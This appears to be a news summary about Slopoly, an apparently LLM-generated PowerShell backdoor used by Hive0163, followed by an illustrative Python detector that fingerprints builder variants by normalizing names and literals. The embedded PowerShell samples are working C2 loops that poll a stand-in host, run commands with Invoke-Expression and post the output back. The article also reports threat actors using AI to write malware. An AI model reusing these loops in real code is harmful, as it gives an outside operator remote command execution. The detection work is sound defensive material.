Hive0163 Uses AI-Assisted Slopoly Malware for Persistent Access in Ransomware Attacks
Briefly
"Although still relatively unspectacular, AI-generated malware such as Slopoly shows how easily threat actors can weaponize AI to develop new malware frameworks in a fraction of the time it used to take. The discovery demonstrates the accelerating threat landscape where artificial intelligence enables rapid malware development."
"There are signs that the malware was developed with the help of an as-yet-undetermined large language model (LLM). This includes the presence of extensive comments, logging, error handling, and accurately named variables. The comments also describe the script as a Polymorphic C2 Persistence Client, indicating that it's part of a command-and-control framework."
"However, the script does not possess any advanced techniques and can hardly be considered polymorphic, since it's unable to modify its own code during execution. The builder may, however, generate new clients with different randomized configuration values and function names, which is standard practice among malware builders."
Cybersecurity researchers discovered Slopoly, an AI-generated malware used by the financially motivated threat actor Hive0163. The malware was deployed post-exploitation to maintain persistent access to compromised servers. Slopoly is a PowerShell-based backdoor with command-and-control capabilities; its extensive comments, logging, error handling, and accurately named variables suggest it was generated with a large language model. It is not genuinely polymorphic, since it cannot modify its own code at run time, but its builder emits new clients with randomized configuration values and function names, which changes each build's file hash. Hive0163 conducts data exfiltration and ransomware attacks and has used other malicious tools including NodeSnake, Interlock RAT, and the JunkFiction loader.
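The practical consequence of a builder that only swaps function names and configuration values is that raw file hashes stop matching while the script's structure does not change at all. The Python below, added here as an illustration and not code from the article, from the researchers, or from Slopoly itself, shows one way a defender can exploit that: strip comments, replace string and numeric literals with placeholders, rename user-defined functions and variables in order of appearance, then hash the result. The three PowerShell snippets are constructed stand-ins for two outputs of a hypothetical builder and one unrelated admin script; they are not samples of the real malware, and the normalization rules are an assumption about what such a builder randomizes, not a description of Slopoly's builder.

```python
"""Structure-normalizing hash for PowerShell scripts.

Two scripts that differ only in identifier names, literals and comments
get the same fingerprint; a script with different logic does not.
Samples below are constructed for this example and are NOT Slopoly code.
"""
import hashlib
import re

# Constructed sample: "client A" from a hypothetical builder.
CLIENT_A = r'''
# Persistence client, build 1
$c2Host = "198.51.100.23"
$sleepSec = 37
function Invoke-Qz9x {
    param([string]$cmd)
    # run an operator command and capture its output
    return (Invoke-Expression $cmd | Out-String)
}
function Start-Hk2p {
    while ($true) {
        $task = Invoke-WebRequest -Uri "http://$c2Host/t" -UseBasicParsing
        $out  = Invoke-Qz9x $task.Content
        Invoke-WebRequest -Uri "http://$c2Host/r" -Method Post -Body $out | Out-Null
        Start-Sleep -Seconds $sleepSec
    }
}
Start-Hk2p
'''

# Constructed sample: "client B", same logic, randomized names and values.
CLIENT_B = r'''
<# Persistence client, build 2 #>
$srvAddr = "203.0.113.9"
$delay = 61
function Invoke-Mm4t {
    param([string]$cmd)
    return (Invoke-Expression $cmd | Out-String)
}
function Start-Zr7v {
    while ($true) {
        $task = Invoke-WebRequest -Uri "http://$srvAddr/t" -UseBasicParsing
        $out  = Invoke-Mm4t $task.Content
        Invoke-WebRequest -Uri "http://$srvAddr/r" -Method Post -Body $out | Out-Null
        Start-Sleep -Seconds $delay
    }
}
Start-Zr7v
'''

# Constructed sample: unrelated admin script, to show the fingerprint is specific.
BENIGN = r'''
$logDir = "C:\Logs"
function Remove-OldLogs {
    Get-ChildItem $logDir -Filter *.log | Where-Object { $_.LastWriteTime -lt (Get-Date).AddDays(-30) } | Remove-Item
}
Remove-OldLogs
'''

# One pass that removes block comments, line comments and string literals.
_TOKEN = re.compile(
    r"(?P<block><#.*?#>)|(?P<line>#[^\n]*)|(?P<str>\"(?:[^\"\\]|\\.)*\"|'[^']*')",
    re.DOTALL,
)
_NUMBER = re.compile(r"\b\d+\b")
_FUNC_DEF = re.compile(r"\bfunction\s+([A-Za-z_][\w-]*)")
_VARIABLE = re.compile(r"\$([A-Za-z_]\w*)")
# PowerShell automatic variables are not builder-controlled; keep them as-is.
_AUTOMATIC = {"_", "true", "false", "null", "psitem", "args", "env", "error"}


def normalize(script: str) -> str:
    """Canonicalize a script so that name/literal randomization has no effect."""
    s = _TOKEN.sub(lambda m: '"STR"' if m.group("str") else " ", script)
    s = _NUMBER.sub("NUM", s)
    # Rename user-defined functions in definition order.
    for i, name in enumerate(_FUNC_DEF.findall(s)):
        s = re.sub(r"\b" + re.escape(name) + r"\b", f"FUNC{i}", s)
    # Rename variables in order of first appearance (case-insensitive, like PowerShell).
    seen: dict[str, str] = {}

    def rename_var(m: re.Match) -> str:
        key = m.group(1).lower()
        if key in _AUTOMATIC:
            return m.group(0)
        seen.setdefault(key, f"$VAR{len(seen)}")
        return seen[key]

    s = _VARIABLE.sub(rename_var, s)
    return re.sub(r"\s+", " ", s).strip().lower()


def raw_hash(script: str) -> str:
    """Ordinary content hash: changes with every rebuild."""
    return hashlib.sha256(script.encode()).hexdigest()


def structural_hash(script: str) -> str:
    """Hash of the normalized script: stable across name/literal randomization."""
    return hashlib.sha256(normalize(script).encode()).hexdigest()


if __name__ == "__main__":
    for label, src in (("A", CLIENT_A), ("B", CLIENT_B), ("benign", BENIGN)):
        print(f"{label:>6}  raw={raw_hash(src)[:12]}  structural={structural_hash(src)[:12]}")
```

Regex normalization is enough to defeat a builder that only renames and re-values, which is the case the researchers describe; it is not robust against statement reordering or real self-modifying code, and for production use the script should be tokenized with PowerShell's own parser rather than with regular expressions.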
Read at The Hacker News